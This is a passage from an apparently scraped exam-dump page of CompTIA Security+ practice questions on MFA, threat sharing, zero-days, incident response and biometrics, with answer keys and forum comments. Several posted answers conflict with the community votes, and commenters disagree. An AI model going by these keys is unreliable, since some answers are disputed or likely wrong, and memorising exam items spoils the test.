  Kalender 2 months, 1 week ago


Selected Answer: A
Physically, the most logical measure is A
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 82/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #45 Topic 1

A company suspects that some corporate accounts were compromised. The number of suspicious logins from locations not recognized by the
users is increasing.
Employees who travel need their accounts protected without the risk of blocking legitimate login requests that may be made over new sign-in
properties. Which of the following security controls can be implemented?

A. Enforce MFA when an account request reaches a risk threshold.

B. Implement geofencing to only allow access from headquarters.

C. Enforce time-based login requests that align with business hours.

D. Shift the access control scheme to a discretionary access control.

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Enforce MFA is the most convenient way
upvoted 11 times

  varun0 5 months ago


Agreed
upvoted 4 times

  ronniehaang Most Recent  4 days, 20 hours ago


Selected Answer: A
A. Enforce MFA when an account request reaches a risk threshold.

Multi-Factor Authentication (MFA) is an effective security control to mitigate the risk of unauthorized access to corporate accounts. By requiring
an additional factor of authentication, such as a one-time code sent to a user's phone or a fingerprint scan, MFA can help prevent attackers from
accessing an account even if they have stolen a password. By implementing MFA only when an account request reaches a risk threshold, the
company can ensure that employees who travel and need their accounts protected will not be negatively impacted by the security control, while
still providing an extra layer of security for those accounts that are at higher risk of being compromised.
upvoted 1 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: A
MFA increases security because even if one credential becomes compromised, unauthorized users will be unable to meet the second
authentication requirement and will not be able to access the targeted physical space, computing device, network, or database.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Enforce MFA when an account request reaches a risk threshold.

This is likely the most convenient implementation that would work for all employees as an additional element(s) would need to be needed for
authentication/authorization.
========================
(B) - Implementing geofencing to only allow access from headquarters might stop the suspicious logins, however, it would be inconvenient for
employees not physically located near headquarters such as the traveling employees.

(C) Enforcing time-based login requests to align with business hours could also be inconvenient for traveling/global employees that work in
different times compared the business's normal business hours.

(D) With Discretionary access control, the owner of a resource can decide who can have access to the resource and you can modify the access
at anytime. The option to shift the access control scheme to a discretionary access control wouldn't really address the login issue either if the
account of someone who is authorized to access a resource was compromised. The attacker can still access the resource using their credentials.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 83/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #46 Topic 1

An organization wants to participate in threat intelligence information sharing with peer groups. Which of the following would MOST likely meet
the organization's requirement?

A. Perform OSINT investigations.

B. Subscribe to threat intelligence feeds.

C. Submit RFCs.

D. Implement a TAXII server.

Correct Answer: D

Community vote distribution


D (92%) 8%

  Boogie_79 Highly Voted  5 months, 1 week ago


Selected Answer: D
A TAXII server is a client that exchanges standardized and anonymized cyber threat intelligence among users. It works as a venue for sharing and
collecting Indicators of compromise, which have been anonymized to protect privacy.
upvoted 17 times

  DALLASCOWBOYS 6 days, 9 hours ago


Most Recent 
D. Implementing a TAXII server helps organizations exchange structured threat information relating to indicators of compromise.
upvoted 2 times

  akingokay 1 month, 3 weeks ago


Selected Answer: D
agree to D
upvoted 1 times

  yasuke 3 months, 1 week ago


Trusted Automated Exchange of Intelligence Information (TAXII™) is an application protocol for exchanging CTI over HTTPS. ​TAXII defines a
RESTful API and a set of requirements for TAXII Clients and Servers
upvoted 4 times

  varun0 5 months ago


Selected Answer: D
Sharing threat information

I'll go with TAXII server


upvoted 4 times

  stoneface 5 months ago


Selected Answer: B
It isn't typical for organizations to build TAXII servers, unless they are a security vendor, but they often connect to TAXII servers to download
threat intelligence documented in the STIX taxonomy. MISP can be configured to do this.
upvoted 2 times

  Jakalan7 4 months, 2 weeks ago


Yes, but the question states they would like to "participate in threat intelligence information sharing", so the answer must be D, TAXII server. If
they subscribe to security feeds, they are only receiving information - they are not sharing any in return.
upvoted 10 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 84/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #47 Topic 1

Which of the following is the MOST effective control against zero-day vulnerabilities?

A. Network segmentation

B. Patch management

C. Intrusion prevention system

D. Multiple vulnerability scanners

Correct Answer: C

Community vote distribution


A (72%) C (19%) 9%

  Ay_ma Highly Voted  4 months, 2 weeks ago


Selected Answer: A
IPS can only protect against known host and application-based attacks and exploits. IPS inspects traffic against signatures and anomalies, it
does cover a broad spectrum of attack types, most of them signature-based, and signatures alone cannot protect against zero-day attacks.
(www.rawcode7.medium.com)

However, with network segmentation, you're able to isolate critical assets into different segments. And when a zero-day attack occurs, you're not
at risk of losing all and are able to isolate the attack's effect to one segment.
upvoted 14 times

  beardsly Highly Voted  4 months, 2 weeks ago


Had to look this up myself as there is no real clear answer here. One of the Sec+ books I have suggested IPS and segmenting. Google search
even says IPS in this regard as well. I would personally say Network Segmentation but otherwise not sure. My comment is not all that helpful I
know but just wanted to throw my thoughts out there.
upvoted 14 times

  TinyTrexArmz 2 days, 9 hours ago


I agree, there is no clear answer here. And though I don't think it's what the test would want us to answer I will say in my 20 years of IT
expereince that a good Patch management process is the most helpful when it comes to zero-day exploits. I say this because once a Zero
Day becomes public knowledge then the vendor normally rushes to put out some kind of patch or workaround. Having a way to deploy that in
a quick and reliable manner is key to getting things back to secure as soon as possible.

But I would say IPS would be most effective against zero day vulnerabilities because you might be able to detect the usual traffic or activity.
Network segmentation will only help slow the intruder down. If you don't have anything to detect the oddity then the attacker could install a
back door and then work their way across the segments. What's the old saying? An once on prevention is worth a pound of cure. But in a
perfect world, both would be implemented. My vote is C.
upvoted 1 times

  hieptran 3 weeks, 5 days ago


To be more clear, zero days is an unknown exploit. There are a few chances that the IPS will detect the attack payloads/signature. But
segregating the network would eventually prevent lateral movement even if the attacker has Remote Code Execution privilege on the
compromised server.
upvoted 4 times

  DALLASCOWBOYS Most Recent  6 days, 8 hours ago


D. Employing multiple vulnerability scanners can detect some zero day exploits but not all. Patch management is another good answer, while it
won't prevent the attack, quickly applying patches and software upgrades can significantly reduce the risk of an attack.

The question says control not prevention.


D is the better answer because it can detect some zero-day exploits.

A web application firewall is one of the most effective ways to prevent zero day attacks, but that is not one of the answers listed.
upvoted 1 times

  DALLASCOWBOYS 6 days, 8 hours ago


A. Network segmentation. I have changed my thoughts and agree Network segmentation, because it isolates it from all outside
communications with an air gap.
upvoted 1 times

  Cber123 3 weeks, 4 days ago


IPS. IPS can either be signature-based or heuristic/behavorial/anomaly-based. The answer doesn't specify what the IPS configuration is, so we
can assume that it is a a heuristic/behviorial/anomaly-based IPS. Network Segmentation is a solution, but it is not the best solution. It is always
better to prevent an attack from happening in the first place than it is to mitigate the impact of an attack after it has occurred.
upvoted 2 times

  markus_was 4 weeks, 1 day ago


https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 85/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Selected Answer: B
B - I need to have the newest patches
upvoted 2 times

  MortG7 3 weeks, 3 days ago


you can have all the patches in the world..they won't help you. They are called zero day because there is no patch for it..at least not at time of
exploitation
upvoted 8 times

  mike47 1 month, 2 weeks ago


Selected Answer: A
A. Network Segmentation is the only answer. There are plenty of website information on this if you type "network segmentation zero day attack"
in the google search. Additionally, the A successful Zero Day attack is something that is hidden, it can only be mitigated to cause less damage.
As there are no Vender patches out there for it.
https://www.networkworld.com/article/2317169/segment-data-centers-to-prevent-zero-day-attacks.html
upvoted 2 times

  JustInTime23 1 month, 4 weeks ago


My Sec+ instructor said that it was IPS, not because IPS can detect the actual zero day, but because the IPS will be able to identify that
something is wrong and then both alert and try to take action.
upvoted 2 times

  tek7ila 2 months, 1 week ago


Selected Answer: A
It's unknown vulnerability so IPS ant other won't help. The only good answer is A.
upvoted 1 times

  EubertT 2 months, 3 weeks ago


Intrusion Protection
While the precise methods of a zero-day exploit can’t be known in advance, a network intrusion protection system (NIPS) can monitor the firms’
network for unusual activity.

The advantage of NIPS over a traditional antivirus-only system is it does not rely on checking software against a known database of threats. This
means it does not need updates or patches to learn about the latest attacks. NIPS works by monitoring the day-to-day patterns of network
activity across the network.
https://cybriant.com/how-to-prevent-zero-day-attacks-in-5-steps/
upvoted 3 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Network segmentation

Network segmentation means you're isolating your network into smaller parts(segments). This can be helpful for providing unique control to each
of those segments. Cyber attacks can spread quickly and a large network just means a large attack surface for an attack to spread through.
Segmenting a network would isolate a zero-day attack to just that network instead losing an entire network you can isolate the attack to just that
segment, hopefully.

An issue with zero-day vulnerabilities is that they are so new that they are likely not going to be detected initially, so the option for IPS (C) or using
vulnerability scanner (D) would not be the most effective in preventing zero-day attacks. Option B would essentially mean having to wait for a
patch to be discovered for the vulnerability, so this option would not work either.
upvoted 1 times

  Eric1212 2 months, 4 weeks ago


Selected Answer: C
From a Comptia instructor," the answer is C"
upvoted 2 times

  VendorPTS 4 months ago


Selected Answer: C
C is the best choice here. The question asks what the most effective control against zero-day vulnerabilities is. Intrusion Prevention Systems (IPS)
both monitor the behavior and protect against activity outside of a defined/expected behavior via system hardening techniques, limiting attack
vectors. Obviously, a system would be safest from attack if it was turned off and inaccessible, but this isn't practical. The system must be booted
to function. This principle carries over to the idea of network segmentation. Often connectivity to other networks to function is required. While
network segmentation could help, it isn't a control that you can apply universally to all systems in all contexts in the way IPS is. IPS isn't always
and only signature-based as some have suggested. Just my two cents.
upvoted 7 times

  db97 4 months, 1 week ago


IPS may detect by: signatures, anomaly behaviors, heuristics, etc.

I think this would be a potential correct answer.


upvoted 3 times

  Halaa 4 months, 4 weeks ago


Selected Answer: A

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 86/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

MOST effective CONTROL


upvoted 5 times
  [Removed] 5 months ago
Selected Answer: B
Patch Management.
upvoted 2 times

  [Removed] 5 months ago


Actually, nevermind. Intrusion prevention system seems to be the best answer here.
upvoted 1 times

  svet123 4 months, 3 weeks ago


This assumes the IPS is able to detect the Zero-Day, which most likely isn't possible since it is a brand new threat. I think its A
upvoted 1 times

  Jakalan7 4 months, 2 weeks ago


There's no way it's patch management, if it's a zero-day attack then it does not matter if your systems are patched or not. Zero-day attacks
have no official patch to fix the issue.
upvoted 8 times

  xOdinx 5 months ago


Selected Answer: A
A - there are no signatures yet to observe in a zero-day
upvoted 5 times

  Joe1984 5 months ago


Selected Answer: A
Don't IPS use signatures as well? Therefore there would not be one cause its zero-day. If a zero day hits one network, segmentation could help
contain it at least.
upvoted 6 times

  stoneface 5 months ago


IPSs can also use behavioral or heuristic based protection.
upvoted 4 times

  Ribeiro19 5 months ago


yes, if you use your baseline. Everything that is not your baseline of activity will raise a flag. But in this question they only say IPS, they do
not specify (heuristic beaver). So i am going to A, segmenting the lan will incrise the security (don't let spreed the zero day by the network).
upvoted 1 times

  xOdinx 5 months ago


But those heuristic patterns need to be observed before they can be added to a threat feed. A zero day would not have a signature.
upvoted 2 times

  Ribeiro19 5 months ago


No, if you use your baseline. Everything that is not your baseline of activity will raise a flag. But in this question they only say IPS, they
do not specify (heuristic beaver). So i am going to A, segmenting the lan will incrise the security (don't let spreed the zero day by the
network).
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 87/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #48 Topic 1

Which of the following is the GREATEST security concern when outsourcing code development to third-party contractors for an internet-facing
application?

A. Intellectual property theft

B. Elevated privileges

C. Unknown backdoor

D. Quality assurance

Correct Answer: C

Community vote distribution


C (88%) 12%

  varun0 Highly Voted  5 months ago


Selected Answer: C
GREATEST security concern would be unknown backdoor
upvoted 11 times

  ronniehaang Most Recent  4 days, 19 hours ago


Selected Answer: C
The greatest security concern when outsourcing code development to third-party contractors for an internet-facing application is the possibility
of an unknown backdoor. This is because a contractor may intentionally or unintentionally insert malicious code into the application that could
compromise the security and privacy of user data and the organization's systems. This risk is elevated if the contractor is not fully vetted, or if the
organization does not have adequate safeguards in place to ensure the security and integrity of the codebase. To mitigate this risk, the
organization should have strict security policies and procedures in place for outsourcing, including background checks for contractors, code
review and testing procedures, and continuous monitoring and incident response processes.
upvoted 1 times

  DALLASCOWBOYS 6 days, 8 hours ago


C. I think Unknown Backdoors would be the GREATEST security concern is the best answer. I do believe D is very good answer because that
would be the first step in risk assessment and mitigation is Quality Assurance.
upvoted 1 times

  sonic1230 3 months, 3 weeks ago


Selected Answer: C
google
upvoted 2 times

  Ay_ma 5 months ago


A- Intellectual Property Theft: I'm guessing by that point a legal contract is already on ground to mitigate such an issue.

Unknown Backdoor, in my opinion, is equivalent to a zero-day attack. You have no idea if these contractors knowingly or unknowingly but a
backdoor in your code

Quality Assurance: I'm guessing that's why you hired them in the first place because you know they deliver quality service.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: C
GREATEST security concern - for me this would be C - Unknown Backdoor
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 88/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  stoneface 5 months ago


Selected Answer: D
If you're outsourcing dev work, you probably have a contract with a legit company and you had probably also reviewed their documents and
AOC's and stuff.

Without good QA, there could be a purposeful OR unintended backdoor in the application if somebody was an incompetent developer

With good QA, ideally they would be doing automated security testing to look for a backdoor in the program.
upvoted 2 times

  Sandon 2 weeks, 3 days ago


Bad Stoneface, bad
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 89/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #49 Topic 1

An organization has hired a red team to simulate attacks on its security posture. Which of the following will the blue team do after detecting an
IoC?

A. Reimage the impacted workstations.

B. Activate runbooks for incident response.

C. Conduct forensics on the compromised system.

D. Conduct passive reconnaissance to gather information.

Correct Answer: C

Community vote distribution


B (95%) 5%

  varun0 Highly Voted  5 months ago


Selected Answer: B
Incident is detected, now incident response has to happen. Runbook describes everyone's roles during incident response.
upvoted 22 times

  stoneface 5 months ago


agreed
upvoted 4 times

  Wiggie Highly Voted  5 months ago


Selected Answer: B
B is correct
upvoted 6 times

  ronniehaang Most Recent  4 days, 19 hours ago


Selected Answer: B
B. Activate runbooks for incident response.

After detecting an Indicator of Compromise (IoC), the blue team will activate runbooks for incident response. The purpose of runbooks is to have
a systematic, documented, and repeatable process to respond to security incidents. The blue team will use the runbooks to assess the scope of
the attack, contain it, and minimize damage. The runbooks will also help the blue team collect and preserve evidence, perform root cause
analysis, and restore normal operations. The blue team will take the information gathered from the runbooks and use it to improve the
organization's security posture.
upvoted 1 times

  DALLASCOWBOYS 6 days, 8 hours ago


B. The blue team is the defense and will defend against the attack
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: C
IoC = Forensics… Both answers seems fine but C answer could be right given the scenario (IoC).
upvoted 2 times

  560exam 1 month, 4 weeks ago


Selected Answer: B
Indicator of Compromise (IOC), Analysts detects that the system has been compromised, next step is to activate run books. Im going with B.
upvoted 2 times

  NICKJONRIPPER 2 months, 2 weeks ago


Selected Answer: B
Incident is found by red team, not actual attack. So it is time to forensic not an incident response.
upvoted 2 times

  NICKJONRIPPER 2 months, 2 weeks ago


C not B
upvoted 2 times

  carpathia 2 months, 4 weeks ago


Selected Answer: B
You don't do Forensics in a Red/Blue team situation.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 90/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 2 times
  babyzilla 3 months ago
Anyone have an update to this? It's either B or C. Both are legit answers, but I'm not sure if this is an "order" based question as in runbooks has
to be activated prior to conducting forensic analysis. Another poorly written question IMO.
upvoted 3 times

  yasuke 3 months, 1 week ago


IOC is digital evidence that a cyber incident has occurred. This intelligence is gathered by security teams in response to speculations of a
network breach or during scheduled security audits.

An Indicator of Attack (IOA), on the other hand, is any digital or physical evidence that a cyberattack is likely to occur.
upvoted 1 times

  ozy_baba 4 months, 3 weeks ago


key word "after detecting an IOC"
upvoted 1 times

  RonWonkers 4 months, 3 weeks ago


Selected Answer: B
I think B
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 91/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #50 Topic 1

An amusement park is implementing a biometric system that validates customers' fingerprints to ensure they are not sharing tickets. The park's
owner values customers above all and would prefer customers' convenience over security. For this reason, which of the following features should
the security team prioritize
FIRST?

A. Low FAR

B. Low efficacy

C. Low FRR

D. Low CER

Correct Answer: C

Community vote distribution


C (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: C
since convenience should be prioritized over security, FIRST priority should be low FRR
upvoted 13 times

  ScottT 4 months, 3 weeks ago


https://www.recogtech.com/en/knowledge-base/security-level-versus-user-convenience - FAR = False Acceptance. FRR = False Rejections
upvoted 3 times

  stoneface 5 months ago


concur
upvoted 3 times

  Sklark Highly Voted  3 months, 2 weeks ago


Could you imagine the uproar of a zoo storing fingerprint data?
upvoted 5 times

  J_Ark1 2 months, 1 week ago


yes all the habitats and species going bananas in their enclosures lol
upvoted 3 times

  DALLASCOWBOYS Most Recent  6 days, 8 hours ago


A. False Acceptance Rate, means you are falsely accepting unauthorized users, therefore, park owner wants to prioritize convenience over
security. This will allow for convenience.

FRR would be falsely rejecting authorized users which would impact convenience.
upvoted 1 times

  DALLASCOWBOYS 6 days, 8 hours ago


C. Changing answer to Low FRR, as you decrease False rjection rate you will increase the rate of false acceptance, therefore more
convenience.
upvoted 1 times

  i_m_Jatin 1 week ago


Low FRR is good answer
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: C
Answer: Low FRR

There are two main metrics that are used to determine the performance of biometrics:

1. FAR (False Acceptance Rate)


2. FRR (False Rejection Rate)

False Acceptance Rate (FAR) is a metric for bio-metric performance that determines the number of instances where unauthorized persons were
incorrectly authorized. False Rejection Rate (FRR) is a metric that determines the number of instances where an authorized person are incorrectly
rejected.

If the emphasis is security, then making sure the False Acceptance Rate is low as a low FAR rate means a lower possibility for someone to be
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 92/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

authorized who shouldn't. If the emphasis is convenience, then you'd want to make sure the False Rejection Rate is low as a low FRR means a
lower possibility for someone to be rejected who should be authorized.
upvoted 3 times
  Tjank 4 months, 1 week ago
Selected Answer: C
FAR (False Acceptance Rate)
FRR (False Rejection Rate)
CER (Crossover Error Rate) AKA ERR (Equal Error Rate)

since he is willing to sacrifice Security for Customer Service, Best way to understand this is.
FAR has to go up in order for FRR to go down.
typical business practice is in the middle of both which would be near the CER.
upvoted 1 times

  banditring 4 months, 3 weeks ago


why would an amusement park even do this?
upvoted 3 times

  RobV 3 months, 3 weeks ago


Disneyworld fingerprint verifies guests.
upvoted 2 times

  RonWonkers 4 months, 3 weeks ago


For the same reason some dude in a math test buys 50 watermelons
upvoted 21 times

  banditring 4 months, 1 week ago


touche lol
upvoted 1 times

  Wutan 4 months, 2 weeks ago


awesome :D
upvoted 1 times

  varun0 5 months ago


Low CER?
upvoted 2 times

  varun0 5 months ago


Disregard this
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 93/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #51 Topic 1

Which of the following organizations sets frameworks and controls for optimal security configuration on systems?

A. ISO

B. GDPR

C. PCI DSS

D. NIST

Correct Answer: D

Community vote distribution


D (80%) A (20%)

  varun0 Highly Voted  5 months ago


Selected Answer: D
NIST I guess
upvoted 10 times

  Tjank Highly Voted  4 months, 1 week ago


Both ISO and NIST have Frameworks for standards.
when searching parts of the question "sets frameworks and controls for optimal security configuration" only NIST came up specifically.
I personally hate these type of questions as I would utilize both to build from.
upvoted 6 times

  rodwave 2 months, 3 weeks ago


Agreed, not a huge fan of the question either. The question only mentions security where both ISO and NIST would cover but I would lean
towards NIST as its specifically for improving cybersecurity.
upvoted 1 times

  ronniehaang Most Recent  4 days, 19 hours ago


Selected Answer: D
D. NIST (National Institute of Standards and Technology) sets frameworks and controls for optimal security configuration on systems. NIST
provides guidelines, standards, and best practices for information security, including the development of security configuration baselines for
various technologies, such as operating systems and applications.
upvoted 1 times

  DALLASCOWBOYS 6 days, 7 hours ago


D. NIST ( National Institute of Standards and Technology) is the standard used by organizations to establish fundamental controls and processes
needed for optimum cybersecurity
upvoted 1 times

  i_m_Jatin 1 week ago


National Institute of Standards and Technology
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: D
https://sopa.tulane.edu/blog/NIST-cybersecurity-
framework#:~:text=The%20National%20Institute%20of%20Standards,and%20how%20it%20is%20implemented.
upvoted 1 times

  shitgod 1 month, 1 week ago


The quality of this question is quite low...
upvoted 2 times

  Knowledge33 3 months, 2 weeks ago


Selected Answer: D
ISO is for all standards, not only security, whereas NIST is only related to security.
upvoted 4 times

  Wutan 4 months, 2 weeks ago


Selected Answer: A
I'd also say its ISO as the question does not state any cybersecurity related information only general security.
upvoted 2 times

  jmb335 4 months, 2 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 94/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

I think its NIST, they created the "CSF Cybersecurity Framework" to help organizations manage risk.
upvoted 3 times

  BM9904 4 months, 3 weeks ago


Selected Answer: A
I am saying A, after researching only ISO explains controls.
NIST CSF – The US National Institute of Standards and Technology framework for improving critical infrastructure cybersecurity
CIS – The Center for Internet Security critical security controls
ISO/IEC 27001 and 27002 – The International Standards Organization frameworks for best practices around security management and controls
upvoted 2 times

  BM9904 4 months, 3 weeks ago


There are many different frameworks; however a few dominate the market. In addition to the Payment Card Industry Data Security Standard
(PCI DSS)
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 95/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #52 Topic 1

An organization discovered files with proprietary financial data have been deleted. The files have been recovered from backup, but every time the
Chief Financial
Officer logs in to the file server, the same files are deleted again. No other users are experiencing this issue. Which of the following types of
malware is MOST likely causing this behavior?

A. Logic bomb

B. Cryptomalware

C. Spyware

D. Remote access Trojan

Correct Answer: A

Community vote distribution


A (100%)

  cozzmo Highly Voted  5 months ago


Logic bomb: a set of instructions secretly incorporated into a program so that if a particular condition is satisfied they will be carried out, usually
with harmful effects.
upvoted 16 times

  varun0 5 months ago


Agreed
upvoted 2 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Logic Bomb

A logic bomb is inserted code that will intentionally set off a malicious function when specified conditions are met. In this question, the logic
bomb could be related to when the CFO logs in as no other user is experiencing this issue.
==================================
Helpful info:
Cryptomalware - A type of ransomware that will encrypt user's files and demand a random

Spyware - a form of malware that hides on your device, monitors activity and steals sensitive information.

Remote Access Trojan (RAT) - malware an attacker uses to remotely control an infected computer
upvoted 7 times

  ronniehaang Most Recent  4 days, 19 hours ago


Selected Answer: A
A. Logic bomb is most likely causing this behavior.

A logic bomb is a type of malware that triggers an action based on certain conditions. In this scenario, the files with proprietary financial data are
being deleted every time the Chief Financial Officer logs in to the file server, which is a clear indication of a logic bomb in action. This type of
malware is designed to cause harm to a target system and can have devastating effects, including data loss and system shutdown.
upvoted 1 times

  DALLASCOWBOYS 6 days, 7 hours ago


A. Logic bomb. Attack is triggered when certain conditions are met.
upvoted 1 times

  xxxdolorxxx 1 week, 6 days ago


Selected Answer: A
I'm saying A. Circumstance happens when a specific set of sequences takes place. I.e. Logic Bomb.
.
B. Cryptomalware (No mention of crypto here)
C. Spyware (No mention of spying or ads specific ads)
D. Remote access Trojan (Not really applicable here)
upvoted 1 times

  nobodyridesforfree 3 months, 2 weeks ago


Selected Answer: A
Logic Bomb is correct as it requires a specific action to occur.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 96/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
Logic bomb

If user-account = chief-financial-officer;
Execute bla bla bla
upvoted 3 times

  Fastytop 3 months, 3 weeks ago


Logic bomb not the types of malware!!!
upvoted 1 times

  VendorPTS 4 months ago


Selected Answer: A
Logic bomb. Occurs upon meeting preset criteria (e.g. a particular user logging on).
upvoted 1 times

  Gravoc 4 months, 2 weeks ago


Logic bomb. When set criteria's/conditions are met, something happens. The condition in this case is the files being accessed = erase.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 97/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #53 Topic 1

A security analyst has identified malware spreading through the corporate network and has activated the CSIRT. Which of the following should the
analyst do
NEXT?

A. Review how the malware was introduced to the network.

B. Attempt to quarantine all infected hosts to limit further spread.

C. Create help desk tickets to get infected systems reimaged.

D. Update all endpoint antivirus solutions with the latest updates.

Correct Answer: B

Community vote distribution


B (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: B
Quarantine to limit further spread
upvoted 14 times

  DALLASCOWBOYS Most Recent  6 days, 7 hours ago


B. Quarantine to limit the spread
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: B
Phases in the Incident Response Plan
1. Preparation: The organization plans out how they will respond to attack, this can involve:
2. Identification: Detecting and determining whether an incident has occurred.
3. Containment: Once a threat has been identified, the organization must limit or prevent any further damage. 4. Eradication: The removal of the
threat
5. Recovery: Restoring systems affected by the incident
6. Lessons Learned: Where the organization reviews their incident response and prepare for a future attack
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Attempt to quarantine all infected hosts to limit further spread.

As soon as the malware was identified, the incident response begins. The steps for incident response are:
1. Preparation - Preparing for an attack and how to respond
2. Identification - Identifying the threat
3. Containment - Containing the threat
4. Eradication - Removing the threat
5. Recovery - Recovering affected systems
6. Lessons Learned - Evaluating the incident response, see where there can be improvements for a future incident.

In the scenario, the malware has already been identified, which means that we are past the Identification step. The next step would be to begin
containment as to limit the amount of damage the malware can cause, so, quarantining infected hosts would be the best option here.
upvoted 3 times

  lordguck 3 months ago


This question is free for interpretation again :-( A is my bet, whereas B (containment)/C (recovery) could be right, too. By activating the CSIRT his
duties regarding containment and recovery could be fullfilled/handed over and the analyst goes to "lessons learnt".
upvoted 1 times

  Jossie_C 3 months ago


Nope. Step 4 isn't urgent unlike quarantining. It's like COVID: quarantine everyone infected, which is containment, then figure out what
happened.
upvoted 1 times

  RonWonkers 4 months, 3 weeks ago


Selected Answer: B
Incident response cycle, step 2 identification > step 3 containment
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 98/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #54 Topic 1

During an incident response, an analyst applied rules to all inbound traffic on the border firewall and implemented ACLs on each critical server.
Following an investigation, the company realizes it is still vulnerable because outbound traffic is not restricted, and the adversary is able to
maintain a presence in the network.
In which of the following stages of the Cyber Kill Chain is the adversary currently operating?

A. Reconnaissance

B. Command and control

C. Actions on objective

D. Exploitation

Correct Answer: C

Community vote distribution


B (91%) 9%

  stoneface Highly Voted  5 months ago


Selected Answer: B
Command and control (C2)—establishment of outbound communications from a victim system for secure communications between victim and
adversary systems. Compromised hosts typically beacon out and await further instruction or exploit when higher order interaction or data
exchange is required. This is the hallmark of advanced persistent threat (APT) attacks and data exfiltration.
upvoted 18 times

  varun0 Highly Voted  5 months ago


Selected Answer: B
able to maintain a presence in the network = C2
upvoted 6 times

  EricShon Most Recent  3 days, 8 hours ago


Selected Answer: B
Command and control (C2 or C&C)—the weaponized code establishes an outbound channel to a remote server that can then be used to control
the remote access tool and possibly download additional tools to progress the attack.
upvoted 1 times

  ronniehaang 4 days, 18 hours ago


Selected Answer: B
The adversary is currently operating in the Command and Control (C2) stage of the Cyber Kill Chain. This stage is characterized by the adversary
establishing and maintaining persistent access to the target network, often through outbound traffic. By maintaining a presence in the network,
the adversary is able to receive instructions and exfiltrate data from the target network, even though inbound traffic is restricted.
upvoted 1 times

  DALLASCOWBOYS 6 days, 7 hours ago


Another tricky ansewer, but B is the best answer as the question indicates the attacker still has the presence in the network. While the outbound
port is still open for communication, which means the attacker still could exfiltrate data, which would suggestion Actions on Objective, the
question does not say the attacker is exfiltrating data.
upvoted 1 times

  its_melly 1 month, 2 weeks ago


Selected Answer: D
At this stage the installation of a remote access Trojan or backdoor on the victim system allows the adversary to maintain persistence inside the
environment.

https://www.usprotech.com/7-essential-steps-cybersecurity-kill-chain-
process/#:~:text=Step%205%3A%20INSTALLATION,maintain%20persistence%20inside%20the%20environment.
upvoted 1 times

  Nome02 2 months ago


C2 is confirmed correct answer as it is mentioned "adversary is able to maintain a presence in the network".
upvoted 1 times

  bengy78 2 months, 3 weeks ago


They have it right C. C2 (B) is for establishing the outbound connection, C per Comptia Certmaster would be correct to transfer data "7. Actions
on objectives—in this phase, the attacker typically uses the access he has achieved to covertly collect information from target systems and
transfer it to a remote system (data exfiltration). An attacker may have other goals or motives, however"
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 99/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Command and control

Command and control is when a data channel has to be established been a compromised host to the attackers central control software so that
